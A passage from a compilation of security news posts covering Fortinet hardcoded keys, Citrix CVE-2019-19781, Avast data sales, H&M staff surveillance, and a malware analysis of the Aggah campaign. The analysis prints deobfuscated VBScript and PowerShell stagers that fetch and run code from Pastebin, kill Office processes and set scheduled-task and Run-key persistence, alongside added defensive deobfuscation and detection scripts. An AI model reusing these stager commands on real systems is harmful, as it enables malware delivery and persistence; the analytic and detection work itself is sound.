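    """Yield (key_type, blob, comment) per key line.

    Skips blank and '#' lines and tolerates a leading options field by
    scanning for the first token that is a known key type. A quoted command
    containing a literal key-type word would confuse this simple scan.
    """
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split()
        for i, token in enumerate(fields):
            if token in KEY_TYPES and i + 1 < len(fields):
                yield token, fields[i + 1], " ".join(fields[i + 2:])
                break


def index_fleet(fleet):
    """Map fingerprint -> sorted list of hosts where that key is authorized."""
    seen = defaultdict(set)
    for host, text in fleet.items():
        for _ktype, blob, _comment in parse_authorized_keys(text):
            seen[fingerprint(blob)].add(host)
    return {fp: sorted(hosts) for fp, hosts in seen.items()}


def find_shared_keys(fleet):
    """Keys present on more than one host: candidates for a baked-in vendor key."""
    return {fp: hosts for fp, hosts in index_fleet(fleet).items() if len(hosts) > 1}


def find_known_keys(fleet, denylist):
    """Hosts that still authorize a fingerprint from a known-bad list
    (e.g. one a vendor publishes for a key that has to be rotated)."""
    return {fp: hosts for fp, hosts in index_fleet(fleet).items() if fp in denylist}


if __name__ == "__main__":
    for fp, hosts in find_shared_keys(FLEET).items():
        print(f"SHARED {fp} on {len(hosts)} hosts: {', '.join(hosts)}")
```

A key shared by two appliances that were installed independently is a strong signal that it came with the image rather than being generated on the device; the `find_known_keys` helper covers the follow-up case where a vendor publishes the fingerprint of a key that must be removed, and the denylist passed to it is the operator’s own input.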

Fortinet also addressed another issue in Fortinet’s FortiSIEM, tracked as CVE-2019-16153, that is related to the presence of a hardcoded password in the FortiSIEM database component. The flaw could be exploited by attackers to access the device database via the use of static credentials.

“A hard-coded password vulnerability in the FortiSIEM database component may allow attackers to access the device database via the use of static credentials.” reads the advisory published by Fortinet.

The issue affects FortiSIEM 5.2.5 and below; it can be addressed by upgrading systems to FortiSIEM 5.2.6 or above.

The issue was reported to Fortinet by the independent security researcher Srour Ganoush, “CERT CYBERPROTECT” and “Chris Armstrong from CSCI, Inc.”

Pierluigi Paganini

(SecurityAffairs – Fortinet, hacking)

The post Fortinet removed hardcoded SSH keys and database backdoors from FortiSIEM appeared first on Security Affairs.

Attacks on Citrix servers increase after the release of CVE-2019-19781 exploits

Citrix has released security patches for the recently disclosed CVE-2019-19781 flaw, but the number of attacks on vulnerable systems is increasing.

Last week, Citrix addressed the actively exploited CVE-2019-19781 flaw in Citrix Application Delivery Controller (ADC), Citrix Gateway, and Citrix SD-WAN WANOP appliances.

While security researchers were warning of ongoing scans for Citrix Application Delivery Controller (NetScaler ADC) and Citrix Gateway (NetScaler Gateway) servers affected by the CVE-2019-19781 vulnerability, many experts were announcing the availability online of proof-of-concept exploit code ([12]).

Researchers at MDSsec published technical details of the vulnerability along with a video that shows the exploit they developed, but they decided not to release it to avoid miscreants using it in the wild.

It has been estimated that 80,000 companies in 158 countries are potentially at risk, most of them in the U.S. (38%), followed by the UK, Germany, the Netherlands, and Australia. 

The CVE-2019-19781 vulnerability was discovered by Mikhail Klyuchnikov from Positive Technologies.

The flaw affects ADC and Gateway versions 10.5, 11.1, 12.0, 12.1, and 13.0, as well as SD-WAN WANOP versions 10.2.6 and 11.0.3.

On Friday, Citrix released the final set of permanent fixes for the vulnerability, for ADC and Gateway version 10.5.

“As with the permanent fixes made available for Citrix ADC and Citrix Gateway versions 11.1, 12.0, 12.1, 13.0, and Citrix SD-WAN 4000-WO, 5000-WO, 4100-WO, and 5100-WO earlier this week, these fixes are available to all customers regardless of whether they have an active maintenance contract with Citrix,” reads the post published by Fermin J. Serna, Chief Information Security Officer at Citrix.

Security experts are monitoring a spike in the number of attacks against Citrix servers after researchers announced the availability online of proof-of-concept exploits for the CVE-2019-19781 flaw in Citrix NetScaler ADC and Citrix NetScaler Gateway servers.

Researchers from FireEye noticed that one of the threat actors involved in the attacks is patching the vulnerable Citrix servers, installing their own backdoor, tracked as NOTROBIN, to clean up other malware infections and to lock out any other threat from exploiting the CVE-2019-19781 Citrix flaw.

The NOTROBIN backdoor was designed to prevent subsequent exploitation of the flaw on Citrix servers and also to establish backdoor access, a circumstance that suggests that attackers are preparing future attacks. 

It is easy to predict that threat actors will continue to target organizations that delay applying the permanent patches or the mitigations. Organizations using Citrix appliances can use the tool released by the company to check for any signs of compromise.

Pierluigi Paganini

(SecurityAffairs – Citrix, hacking)

The post Attacks on Citrix servers increase after the release of CVE-2019-19781 exploits appeared first on Security Affairs.

Data breach: Why it’s time to adopt a risk-based approach to cybersecurity

The recent high-profile ransomware attack on foreign currency exchange specialist Travelex highlights the devastating results of a targeted cyber-attack. In the weeks following the initial attack, Travelex struggled to bring its customer-facing systems back online. Worse still, despite Travelex’s assurances that no customer data had been compromised, hackers were demanding $6 million for 5GB of sensitive customer information they claim to have downloaded. Providing services to some of the world’s largest banking corporations including HSBC, … More

The post Data breach: Why it’s time to adopt a risk-based approach to cybersecurity appeared first on Help Net Security.

How to detect and prevent issues with vulnerable LoRaWAN networks

IOActive researchers found that the LoRaWAN protocol – which is used across the globe to transmit data to and from IoT devices in smart cities, Industrial IoT, smart homes, smart utilities, vehicle tracking and healthcare – has a host of cyber security issues that could put network users at risk of attack. Such attacks could cause widespread disruption or in extreme cases even put lives at risk. Session Keys and Functions in LoRaWAN v1.0.3 Vulnerable … More

The post How to detect and prevent issues with vulnerable LoRaWAN networks appeared first on Help Net Security.

Are Companies Adhering to CCPA Requirements?

Some Are Not Giving Customers Option to Opt out of Data Sale, Legal Experts Say
Many companies that should be offering customers the ability to "opt out" of the sale of their information under the California Consumer Privacy Act are failing to do so because of the law's ambiguities, some legal experts say. CCPA went into effect Jan. 1, but it won't be enforced until July.

52% of companies use cloud services that have experienced a breach

Seventy-nine percent of companies store sensitive data in the public cloud, according to a McAfee survey. Anonymized cloud event data showing percentage of files in the cloud with sensitive data While these companies approve an average of 41 cloud services each, up 33 percent from last year, thousands of other services are used ad-hoc without vetting. In addition, 52 percent of companies use cloud services that have had user data stolen in a breach. By … More

The post 52% of companies use cloud services that have experienced a breach appeared first on Help Net Security.

Avast Subsidiary Sells User Browsing History

A subsidiary of Avast antivirus is selling sensitive user browsing data to many companies, including Revlon, Microsoft, Google, Yelp, Condé Nast, and TripAdvisor.

According to a recent joint investigation by Vice’s Motherboard and PCMag, highly granular and sensitive user data from users of Avast antivirus is being repackaged and sold to companies via a subsidiary called Jumpshot, which promises buyers of the data information on “Every search. Every click. Every buy. On every site.”

Avast’s “free” or “freemium” antivirus software has over 435 million active users, with 100 million devices feeding data into Jumpshot, including Google searches, LinkedIn activity, YouTube activity, and activity on pornographic websites. According to the Motherboard article, “multiple Avast users… were not aware Avast sold browsing data, raising questions about how informed that consent is.”

The primary method of Avast’s data collection was initially via web browser plugins distributed through subsidiaries such as AVG. After privacy concerns were raised by security researchers, Google, Mozilla, and Firefox removed and banned these extensions from their respective web browsers. Since then, the company has begun harvesting user information through its anti-virus software. 

Representatives from Avast responded to the report by emphasizing that users can opt out of their data collection, and that any data collected is anonymized.

“We have a long track record of protecting users’ devices and data against malware, and we understand and take seriously the responsibility to balance user privacy with the necessary use of data,” the company announced in a statement. 

Critics of the company’s data collection policies responded to this statement with skepticism.

“It’s almost impossible to de-identify data,” said law professor Eric Goldman. “When they promise to de-identify the data, I don’t believe it.”

Read the article here.

The post Avast Subsidiary Sells User Browsing History appeared first on Adam Levin.

Navigating ICS Security: Having your Action Plan Ready

Trust, respect, understanding. These are all two-way relationships that must be earned over time. Whilst someone being hired in a senior position will likely already have a certain level of each, part of your job is to continuously cultivate all three of these elements with colleagues no matter your grade. When working within a cybersecurity […]… Read More

The post Navigating ICS Security: Having your Action Plan Ready appeared first on The State of Security.

Benefits of blockchain pilot programs for risk management planning

Through 2022, 80% of supply chain blockchain initiatives will remain at a proof-of-concept (POC) or pilot stage, according to Gartner. One of the main reasons for this development is that early blockchain pilots for supply chain pursued technology-oriented models that have been successful in other sectors, such as banking and insurance. However, successful blockchain use cases for supply chain require a different approach. “Modern supply chains are very complex and require digital connectivity and agility … More

The post Benefits of blockchain pilot programs for risk management planning appeared first on Help Net Security.

Plights of the Round Table – Strategic Lessons from the Casino

In Part 1 of the Plights of the Round Table, the executive staff of Camelot was working on the strategic plan for the following year. Morgan, the CEO, needs to decide how to spend her limited budget for the best interest of Camelot. Lana, the VP of Sales, thinks they should invest in horses for […]… Read More

The post Plights of the Round Table – Strategic Lessons from the Casino appeared first on The State of Security.

Security Compass enables CSPs to set up and develop their FedRAMP initiatives

Security Compass, a software security company that provides organizations with technology to make software secure, has introduced feature enhancements to SD Elements that enable cloud service providers (CSPs) to set up and develop their Federal Risk and Authorization Management Program (FedRAMP) continuous compliance initiatives in a coherent and structured way. Available now, SD Elements customers will automatically receive FedRAMP reporting capabilities supported by new FedRAMP content in the knowledgebase, and SD Elements tasks with additional … More

The post Security Compass enables CSPs to set up and develop their FedRAMP initiatives appeared first on Help Net Security.

Cisco’s first Cybersecurity Co-Innovation Center in Europe opens in Milan

Cisco‘s first Cybersecurity Co-Innovation Center in Europe opened its doors in Milan at the Leonardo da Vinci Science and Technology Museum. The center was inaugurated in the presence of Paola Pisano, Minister for Technological Innovation and Digitization; Roberto Baldoni, Deputy Director General of DIS (Prime Ministerial Department of Security Information); and Giuseppe Sala, Mayor of Milan. Cisco Chairman and CEO Chuck Robbins gave the inaugural address, joined by the CEO of Cisco Italy, Agostino Santoni, … More

The post Cisco’s first Cybersecurity Co-Innovation Center in Europe opens in Milan appeared first on Help Net Security.

Cybraics partners with AVANT to expand reach of its AI-backed threat detection services

Cybersecurity and analytics firm Cybraics announced a partnership with AVANT, an IT decision-making platform for next-generation technologies, further expanding the reach of the company’s artificial intelligence-backed threat detection services. “We are excited to partner with AVANT to offer our advanced threat detection services throughout their nationwide network of Trusted Advisors,” said Nate Grinnell, Vice President of Sales, Cybraics. “Robust cybersecurity practices are essential for the health of all companies, but many still have limited resources … More

The post Cybraics partners with AVANT to expand reach of its AI-backed threat detection services appeared first on Help Net Security.

Alfresco and Tech Mahindra collaborate on four jointly-developed insurance solutions

Alfresco Software, an open source content, process and governance software company, and Tech Mahindra, a leading provider of digital transformation, consulting and re-engineering services and solutions, announced collaboration on four jointly-developed, transformative insurance solutions. The collaboration combines Tech Mahindra’s insurance expertise and experience in the insurance industry with Alfresco’s powerful Digital Business Platform to create solutions for risk management, automated underwriting, a self-learning chatbot, and intelligent claims handling. Gautam Bhasin, Global Head – Banking, Financial … More

The post Alfresco and Tech Mahindra collaborate on four jointly-developed insurance solutions appeared first on Help Net Security.

SecureLink announces distribution partnership with ShiftLeft for GCC and Egypt

SecureLink, a risk advisory firm based in Dubai and part of the StarLink group, the region’s “True” Value-Added-Distributor (VAD), announced signing a distribution partnership with ShiftLeft for GCC and Egypt. ShiftLeft is the fastest and most accurate application security testing product in the industry. It integrates directly into DevOps pipelines via pull request or build, and it can analyze 500,000 lines of code in under 10 minutes. This enables AppSec teams to insert security into … More

The post SecureLink announces distribution partnership with ShiftLeft for GCC and Egypt appeared first on Help Net Security.

Cymatic selects security experts for advisory roles

Cymatic announced the launch of its advisory board, a community of international security and risk experts providing brand counsel, technical guidance, and market leadership to ensure the success and relevance of the Cymatic next-generation all-in-one web application defense platform. Cymatic offers the only unified security platform that deploys at the client through a simple line of JavaScript without agents or proxies to deliver first-look, first-strike capability that is earliest in the kill chain. It provides … More

The post Cymatic selects security experts for advisory roles appeared first on Help Net Security.

Sixgill appoints Meira Primes as chief marketing officer

Sixgill, a leading threat intelligence company, has appointed Meira Primes, a veteran strategist and marketer, as chief marketing officer. The appointment comes as Sixgill announced it is moving into larger offices to support growth as the company continues to capitalize on increased market recognition and demand for the company’s threat intelligence platform. In her role, Primes will be responsible for overall marketing strategy, brand management, public relations, and lead generation – guiding the overall sales … More

The post Sixgill appoints Meira Primes as chief marketing officer appeared first on Help Net Security.

SoftServe attains Data Analytics Specialization in Google Cloud Premier Partner Program

SoftServe, a leading digital authority and consulting company, has achieved the Data Analytics Specialization in the Google Cloud Premier Partner Program. This Partner Specialization affirms that SoftServe has demonstrated success turning large amounts of data into insights using Google Cloud Platform (GCP) technology. The company also recently surpassed a milestone 400 GCP certifications. “SoftServe has the proficiency and expertise with GCP technology that allow us to turn huge amounts of unstructured data into actionable insights … More

The post SoftServe attains Data Analytics Specialization in Google Cloud Premier Partner Program appeared first on Help Net Security.

Avast antivirus allegedly sold identifiable personal information to third parties

Avast has never made its data collection practices a secret, but a joint report by Vice’s Motherboard and PCMag has revealed that the supposedly anonymized data can still be traced back to specific individuals.

After sifting through leaked user data and company documents, the report published today gave an unobstructed view of the type of data Avast–specifically its subsidiary Jumpshot–collected and sold. Unsurprisingly, some are deeply personal.

The data type Avast hoarded wasn’t the issue, but rather their nuance. In one example, Avast was able to precisely pinpoint a user’s Amazon purchase down to the minute. PCMag argued that Amazon could easily use this information to pinpoint a specific user. Once it’s got a match, the company could then link the user profile to the device ID, which is a constant identifier assigned by Avast for activities generated from the same device.

People took to social media quickly after the news broke to share their thoughts.


Avast allegedly avoided selling information with the device ID attached for that reason, but in 2018, that’s exactly what it sold to marketing provider Omnicom Media Group. The package also contained the users’ age, gender, and clicking timestamps down to the millisecond.

In December 2019, Google Chrome and Mozilla Firefox banned the Avast browser extension over its data collection practices. Following the ban, Avast issued a statement maintaining that it scrubbed all collected data free of personal information. It then continued to collect data through its antivirus software installed in the Windows operating system. These bits of data range from Google and YouTube searches to location and porn habits.

On its website, Avast stated that it has more than 400 million users distributed across 59 countries.

Jumpshot listed IBM, Microsoft, and Google as companies that it has previously worked with. In addition, PCMag also listed Nestle, Purina, Intuit and others as clients.

IT World Canada has reached out to Google, Microsoft, and IBM, but none were immediately available for comment.


Did H&M spy on its German employees? Privacy watchdog opens an investigation

A German privacy watchdog is investigating clothing retailer H&M because it was allegedly spying on its customer service representatives in Germany.

Hamburg’s data protection commissioner has launched an investigation into Swedish clothing retailer H&M (Hennes & Mauritz) amid evidence that the company was spying on its customer service representatives in Germany.

According to the German privacy watchdog, a hard drive containing about 60 gigabytes of data revealed that superiors at the site in Nuremberg kept “detailed and systematic” records about employees’ private and sensitive data.

“Hamburg’s data protection commissioner said in a statement Monday that a hard drive containing about 60 gigabytes of data revealed that superiors at the site in Nuremberg kept “detailed and systematic” records about employees’ health, from bladder weakness to cancer, and about their private lives, such as family disputes or holiday experiences.” reads a post published by the Associated Press.

Johannes Caspar, the state data protection officer in Hamburg, said the records demonstrate a massive surveillance activity on employees. The records were accessible to all company managers.

“In fact, there was a massive spying out of the employees at the location in Nuremberg,” said Caspar of the German Press Agency. “This has resulted in a significant evaluation of the reports available to us.” 


The situation is very severe for H&M that in response said in a statement that it takes the case “very seriously” and expressed its “honest regret” to the affected staff.

“The qualitative and quantitative extent of the employee data accessible to the entire management level of the company shows a comprehensive research of the employees, which has not been comparable in the past few years,” added Caspar. “It is also health data of those affected, from bladder weakness to cancer, as well as data from people in their social environment, such as family disputes, deaths or holiday experiences.”

The company said that it is cooperating fully with data protection officials, and added that its managers had already taken urgent measures in response to the incident.

In the coming weeks, the data protection officer will decide on the fines for this case. Under the EU GDPR, H&M could face a fine of four percent of global annual sales.

Pierluigi Paganini

(SecurityAffairs – H&M, privacy)

The post Did H&M spy on its German employees? Privacy watchdog opens an investigation appeared first on Security Affairs.

Sen. Wyden Asks NSA About Trump Administration Device Security

Senator Voices Concerns in Light of Report That Jeff Bezos' Smartphone Was Hacked
U.S. Senator Ron Wyden, D-Ore., has called on the National Security Agency to take steps to make sure the personal devices of high-ranking Trump administration officials are secure following a report last week that Amazon CEO Jeff Bezos' smartphone had been compromised.

Aggah: How to run a botnet without renting a Server (for more than a year)

Experts from Yoroi-Cybaze ZLab have spotted new attack attempts directed at some Italian companies operating in the retail sector and linked to the Aggah campaign.


During the last year, we constantly kept track of the Aggah campaigns. We started by digging into the Roma225 campaign and went on with the RG campaign, contributing to the joint effort to track the offensive activities of this threat actor.

Recently, during our Cyber Defence monitoring operations, we spotted other attack attempts directed at some Italian companies operating in the retail sector. For this reason, the Cybaze-Yoroi ZLab team decided to dissect this latest Aggah campaign and track its latest variations.

Technical Analysis

Threat: Yakka3 Campaign
Brief Description: Malicious PPA file dropper with macro

Table 1. Sample information

The initial file is a Microsoft PowerPoint PPA file. It is actually an add-in file, designed to add new behaviour to classic PowerPoint presentations; in this case it adds a malicious macro:

Figure 1: Piece of the malicious macro

The malicious code within the PPA abuses the Microsoft mshta utility to download a web page from the BlogSpot platform.

Figure 2: Result of the link

The HTML page closely matches the modus operandi of the previous Aggah threat. In this case, the blogspot post is named “20sydney new” but it uses the same trick from the past: hiding the javascript stager code inside the web page, an ad hoc code snippet which will be interpreted and executed only by the mshta engine.

Figure 3: Malicious code hidden in the Blogspot web page and executed by the MSHTA engine

The parameter passed to the “unescape()” function contains another two layers of encoded strings, a sort of “matryoshka unescape obfuscation”. After peeling off these layers, we recovered the malicious logic of the stager:

    <script language="VBScript">
    Set M_c = CreateObject(StrReverse("llehS.tpircSW"))
    Dim L_c
    L_c = StrReverse("exe.drowniw mi/ f/ llikksat & exe.lecxe mi/ f/ llikksat c/ dmc")
    M_c.Run L_c, vbHide
    set Ixsi = CreateObject(StrReverse("llehS.tpircSW"))
    Dim Bik
    Bik1 = "mshta http:\\\raw\JELH48mw"
    Bik1, vbHide
    set nci = CreateObject(StrReverse("llehS.tpircSW"))
    Dim xx
    xx1 = "r ""mshta http:\\\raw\JELH48mw"" /F "
    xx0 = StrReverse("t/ )+niam+( nt/ 06 om/ ETUNIM cs/ etaerc/ sksathcs")
    xx0 + xx1, vbHide
    Set ll = CreateObject(StrReverse("llehS.tpircSW"))
    no = StrReverse("mmetsaP\nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS\UCKH")
    ll.RegWrite no,"mshta http:\\\raw\NxJCPTmQ","REG_SZ"
    self.close
    </script>

Code Snippet 1

The first part of this initial implant kills the Word and Excel processes. Immediately after that, the malware downloads further code by leveraging mshta once again, this time from a Pastebin snippet.
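The stager above hides every meaningful string behind StrReverse(), so the commands it runs are not visible to a casual reader or a naive string scan. The following Python helper is an added example, not code from the Yoroi-Cybaze ZLab write-up: it rewrites each StrReverse("...") call into its plaintext and tags the recovered strings with the behaviour they implement, so an analyst can read the stager statically without executing it. The sample input is a constructed excerpt that reuses the obfuscated literals shown in Code Snippet 1; the tag names in classify() are this example's own.

```python
"""Recover the strings that the Aggah VBScript stager hides with StrReverse().

Added example, not code from the Yoroi-Cybaze ZLab write-up: it rewrites
every StrReverse("...") call into the plaintext literal so an analyst can read
the stager's commands statically, without running mshta or the script. The
sample below is a constructed excerpt that reuses the obfuscated literals
shown in Code Snippet 1.
"""
from __future__ import annotations

import re

# Constructed excerpt of Code Snippet 1 (curly quotes normalised to straight quotes).
SAMPLE_STAGER = r'''
Set M_c = CreateObject(StrReverse("llehS.tpircSW"))
L_c = StrReverse("exe.drowniw mi/ f/ llikksat & exe.lecxe mi/ f/ llikksat c/ dmc")
M_c.Run L_c, vbHide
xx0 = StrReverse("t/ )+niam+( nt/ 06 om/ ETUNIM cs/ etaerc/ sksathcs")
no = StrReverse("mmetsaP\nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS\UCKH")
'''

# Matches StrReverse("literal"); the literal never contains a double quote in this stager.
STRREVERSE_CALL = re.compile(r'StrReverse\("([^"]*)"\)', re.IGNORECASE)


def hidden_strings(script: str) -> list[str]:
    """Return the plaintext of every StrReverse() literal, in order of appearance."""
    return [m.group(1)[::-1] for m in STRREVERSE_CALL.finditer(script)]


def deobfuscate(script: str) -> str:
    """Rewrite each StrReverse("...") call as the plain string it evaluates to."""
    # A lambda avoids re.sub treating backslashes in registry paths as escapes.
    return STRREVERSE_CALL.sub(lambda m: '"' + m.group(1)[::-1] + '"', script)


def classify(plaintext: str) -> str:
    """Tag a recovered string with the stager behaviour it implements (defender triage)."""
    p = plaintext.lower()
    if p == "wscript.shell":
        return "wscript-shell-object"
    if p.startswith("cmd") and "taskkill" in p:
        return "kill-office-processes"
    if p.startswith("schtasks"):
        return "scheduled-task-persistence"
    if "\\currentversion\\run\\" in p:
        return "run-key-persistence"
    return "unclassified"


def triage(script: str) -> list[tuple[str, str]]:
    """Pair each recovered string with its behaviour tag."""
    return [(s, classify(s)) for s in hidden_strings(script)]


if __name__ == "__main__":
    print(deobfuscate(SAMPLE_STAGER))
    for plain, tag in triage(SAMPLE_STAGER):
        print(f"{tag:28} {plain}")
```

Run stand-alone, the script prints the stager with every StrReverse() resolved, followed by one line per recovered string: the WScript.Shell object, the taskkill command for Excel and Word, the schtasks command that re-runs mshta every 60 minutes, and the HKCU Run key path used for persistence. The same approach extends to the other pastes, since all three snippets on this page build their strings with either StrReverse() or character-by-character concatenation.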

Figure 4: Piece of the malicious Pastebin

The author of these pastes is no longer “HAGGA”, as seen in our previous analysis; the actor has now moved to another account, “YAKKA3”:

Figure 5: Evidence of YAKKA3 Pastebin user

The paste was created on 25 November 2019 and has likely been edited many times over the course of the last month. In the past Aggah frequently changed the content of his pastes to modify the malware behaviour and drop many kinds of malware, some of which were suspected to be related to the Gorgon APT group. At the time of analysis, the content of the encoded string was the following:

    <script language="VBScript">
    Set MVn = CreateObject(StrReverse("llehS.tpircSW"))
    Mcn = "powershell do {$ping = test-connection -comp -count 1 -Quiet} until ($ping);[void] [System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');$fj=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),'Dow$_$loadStri$_$g'.replace('$_$','n'),[Microsoft.VisualBasic.CallType]::Method,'')|IEX;[Byte[]]$f=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),'Dow$_$loadStri$_$g'.replace('$_$','n'),[Microsoft.VisualBasic.CallType]::Method,'').replace('*','0x')|IEX;[vroombrooomkrooom]::kekedoyouloveme('calc.exe',$f)"
    MVn.Run Mcn, vbHide
    self.close
    </script>

Code Snippet 2

The above script is a piece of VBScript designed to run a further PowerShell loader. The PowerShell script first tests internet connectivity with a ping (test-connection) and then starts the infection. It downloads two other pastes: the first is a PE file and the second is a custom .NET process injection utility.

The Injector

Threat: Yakka3 Campaign
Brief Description: Injector through process hollowing

Table 2. Sample information of the injector 

The injector component is invoked through its static method “[vroombrooomkrooom]::kekedoyouloveme(‘calc.exe’,$f)”, as seen in Code Snippet 2. The only purpose of this component is to inject a payload into the memory of another process, the one named by its first parameter.

Figure 6: Write Process Memory technique

The injection technique is very basic: it uses the textbook “CreateRemoteThread” technique, which is well documented and actively used by many actors and malware developers.

Figure 7: Injected payload inside calc.exe process

UAC Bypass Tool

In Code Snippet 1 we saw that the Aggah implant persists on the target machine by writing the “mshta http:[\\pastebin.]com\raw\NxJCPTmQ” command to the registry key “HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Pastemm”, so it can potentially load a different payload on every run.
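Every stage of the chain described so far leaves the same footprint in endpoint telemetry: mshta.exe started by an Office process, mshta.exe handed a URL on a paste or blog service, a schtasks /create command whose action is mshta, and a Run-key value that invokes mshta. The following Python detection logic is an added example, not code from the Yoroi-Cybaze ZLab report or from any product: it scores constructed, Sysmon-style process-creation and registry events for exactly those behaviours. The hostnames, paths and paste IDs in the sample events are constructed placeholders, not indicators from the report.

```python
"""Flag the Aggah stager chain in process-creation and registry telemetry.

Added example, not from the Yoroi-Cybaze ZLab write-up or any product: it
scores constructed, Sysmon-style events for the behaviours documented above,
namely mshta.exe spawned by an Office process, mshta fetching a remote page
from a paste or blog service, schtasks scheduling mshta, and a Run-key value
that invokes mshta. Hostnames, paths and paste IDs in the sample events are
constructed placeholders, not indicators from the report.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

# Office hosts that should never need to spawn mshta.exe.
OFFICE_PARENTS = {"powerpnt.exe", "winword.exe", "excel.exe", "outlook.exe"}
# Public services the write-up names as the actor's command channel.
PASTE_HOSTS = ("pastebin.com", "blogspot.com")

URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
RUN_KEY_RE = re.compile(r"\\Microsoft\\Windows\\CurrentVersion\\Run\\", re.IGNORECASE)


@dataclass
class Event:
    kind: str          # "process" or "registry"
    image: str = ""    # image basename of the created process
    parent: str = ""   # image basename of its parent
    cmdline: str = ""  # full command line
    key: str = ""      # registry key written (registry events)
    value: str = ""    # registry data written (registry events)


@dataclass
class Alert:
    rule: str
    severity: str
    detail: str


def detect(ev: Event) -> list[Alert]:
    """Return every rule the event triggers; an empty list means nothing suspicious."""
    alerts: list[Alert] = []
    if ev.kind == "process":
        image, parent, cmd = ev.image.lower(), ev.parent.lower(), ev.cmdline.lower()
        if image == "mshta.exe":
            if parent in OFFICE_PARENTS:
                alerts.append(Alert("mshta-from-office", "high", f"parent={ev.parent}"))
            url = URL_RE.search(ev.cmdline)
            if url:  # mshta given a remote document rather than a local .hta
                host = url.group(0).split("/")[2].lower()
                sev = "high" if host.endswith(PASTE_HOSTS) else "medium"
                alerts.append(Alert("mshta-remote-url", sev, f"url={url.group(0)}"))
        elif image == "schtasks.exe" and "/create" in cmd and "mshta" in cmd:
            alerts.append(Alert("schtasks-mshta", "high", ev.cmdline))
    elif ev.kind == "registry":
        if RUN_KEY_RE.search(ev.key) and "mshta" in ev.value.lower():
            alerts.append(Alert("runkey-mshta", "high", f"{ev.key} = {ev.value}"))
    return alerts


def sample_events() -> list[Event]:
    """Constructed telemetry mirroring the chain in the write-up, plus one benign event."""
    return [
        Event("process", image="mshta.exe", parent="POWERPNT.EXE",
              cmdline="mshta http://example-actor.blogspot.com/p/placeholder-post.html"),
        Event("process", image="schtasks.exe", parent="cmd.exe",
              cmdline='schtasks /create /sc MINUTE /mo 60 /tn "(+main+)" '
                      '/tr "mshta http://pastebin.com/raw/PLACEHOLDER1" /F'),
        Event("registry",
              key=r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Pastemm",
              value="mshta http://pastebin.com/raw/PLACEHOLDER2"),
        Event("process", image="mshta.exe", parent="explorer.exe",
              cmdline=r'mshta "C:\ProgramData\Vendor\local-help.hta"'),  # benign local HTA
    ]


if __name__ == "__main__":
    for ev in sample_events():
        for a in detect(ev):
            print(f"[{a.severity}] {a.rule}: {a.detail}")
```

The design choice worth noting is that none of the rules key on a paste ID or hostname from the campaign: the actor rotates those freely (the write-up itself shows HAGGA, YAKKA3 and YAKKA4 accounts), whereas mshta fetching remote content, an Office parent, and an mshta action in a scheduled task or Run key are properties of the technique that survive every rotation. The benign local-HTA event in the sample shows the rules staying quiet when mshta is used for its legitimate purpose.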

Figure 8: Piece of the malicious script executed by the persistence mechanism

Unlike the previous pastes, the author of this one is YAKKA4, probably a form of redundancy in case the other accounts are taken down.

Figure 9: YAKKA4 evidence

Anyway, the code served by this paste downloads another binary file from an additional Paste site:

    <script language="VBScript">
    Set i9i9 = CreateObject("W" + "S" + "c" + "r" + "i" + "p" + "t" + "." + "S" + "h" + "e" + "l" + "l")
    i9i9.Run("P" + "o" + "w" + "e" + "r" + "s" + "h" + "e" + "l" + "l" + "." + "e" + "x" + "e -noexit [Byte[]]$sc64= iex(iex('(&" + "(GCM *W-O*)'+ 'Net.'+" + "'WebC'+'l" + "ient)'+'.Do" + "w'+'nload'+'Str'+'ing("https://p" + "").repl" + "ace("*^*","^%$").r" + "e" + "p" + "l" + "a" + "c" + "e" + "("^%$","0x")'));[<##>" + "Ap" + "pDomain<##>]::<##>('(" + "&$@#$%^&*(urrent" + "Domain'.rep" + "lace('(&$@#$%^&*(','C'))<##>.<##>('%" + "*&^*&^*&^*&^*&oad'.r" + "eplace('%" + "*&^*&^*&^" + "*&^*&" + "','L'))(" + "$sc64).'EntryP" + "oint'<##>.<##>('in*&^*" + "&^*&^&*^*&^o" + "k))*()*)(**(&(*&'.r" + "e" + "p" + "l" + "a" + "c" + "e" + "('))*()*)(**" + "(&(*&','e').r" + "e" + "p" + "l" + "a" + "c" + "e" + "('*&^" + "*&^*&^&*^*&^','v'))($null,$null)"),0
    self.close
    </script>

Code Snippet 3

This last binary is actually a hacking tool implementing the CMSTP bypass, a technique used to bypass Windows UAC prompts.

According to the Microsoft Documentation, “Connection Manager is a suite of components that provides administrators with the ability to create and distribute customized remote access connections and to create, distribute, and automatically update customized phone books.”.

However, attackers can abuse a malicious INF file to execute arbitrary commands while bypassing UAC, elevating privileges in a stealthy way. In this case the CMSTP bypass technique is implemented in a .NET executable.

Figure 10: Synthesis of the CMSTP Bypass technique

The Payload

As we saw in the past, Aggah has changed its payloads over time, and this time we observed that the delivered malware was not RevengeRAT but a LokiBot variant. This info stealer has been well known in the community since 2016 and has been analyzed in depth over the years.

In this case, it has the following configuration:

Figure 11: Loki Bot configuration with communication to the C2

The December Payloads

As anticipated above, Aggah payloads are quite dynamic. According to observations by community researchers such as @DrStache, the Aggah Pastebin accounts were dropping the AZORult infostealer a few days before the LokiBot observation.

Investigating the C2 infrastructure through the Azorult-Tracker services, we noticed that the AZORult malware distributed by Aggah in that period was targeting a modest number of victims, mainly located in the United States and the United Arab Emirates, and also in Pakistan, Germany and Israel.


The Aggah actor keeps threatening organizations all around the world. Over time it has built a custom stager implant based on legitimate third-party services, such as Pastebin and BlogSpot, which the actor abuses to manage the infected hosts and to run its botnet without renting a server.

During the last year we contributed to the joint effort to track its activities, along with PaloAlto’s Unit42, and after a year we can confirm it is still active and dangerous. At the moment it is not clear if this actor is just selling its hacking services or running its own campaigns, or both.

In conclusion, there is no hard evidence confirming or denying its potential relationship with the Gorgon APT, and factors such as the different nationalities and the small number of victims connected to the December Aggah activities do not help to exclude it.

Further technical details, including Indicators of Compromise (IoCs) and Yara rules, are reported in the analysis published by Yoroi-Cybaze ZLab:

Pierluigi Paganini

(SecurityAffairs – Aggah, botnet)

